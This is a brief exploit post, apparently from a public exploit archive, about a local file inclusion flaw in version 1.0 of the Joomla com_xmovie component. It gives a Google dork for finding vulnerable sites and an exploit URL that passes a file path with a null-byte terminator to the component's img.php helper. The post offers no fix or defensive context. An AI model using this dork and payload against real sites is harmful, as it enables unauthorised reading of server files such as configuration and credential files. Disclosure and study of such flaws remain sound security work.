id: 15236
date: 12/25/2010
title: Joomla Component com_xmovie 1.0 Local File Inclusion Vulnerability
author: KelvinX
cves: 

# Exploit Title: Joomla Component com_xmovie 1.0 Local File Inclusion Vulnerability
# Author: KelvinX (kelvinxgr@gmail.com)
# Websites: http://xgroup.vn, http://kelvinx.net, http://facebook.com/kelvinxgr
# Date: December, 24-2010
# Location: HCM City, Vietnam
 
------------------------
 
# Application: com_xmovie
# Version: 1.0
# Vendor: http://extensions.joomla.org/extensions/multimedia/multimedia-players/video-players-a-gallery/15297
# Google Dorks: inurl:com_xmovie
 
------------------------
 
Exploit: http://www.site.com/components/com_xmovie/helpers/img.php?file=[LFI]%00
 
------------------------



#  0day.today [2023-03-26]  #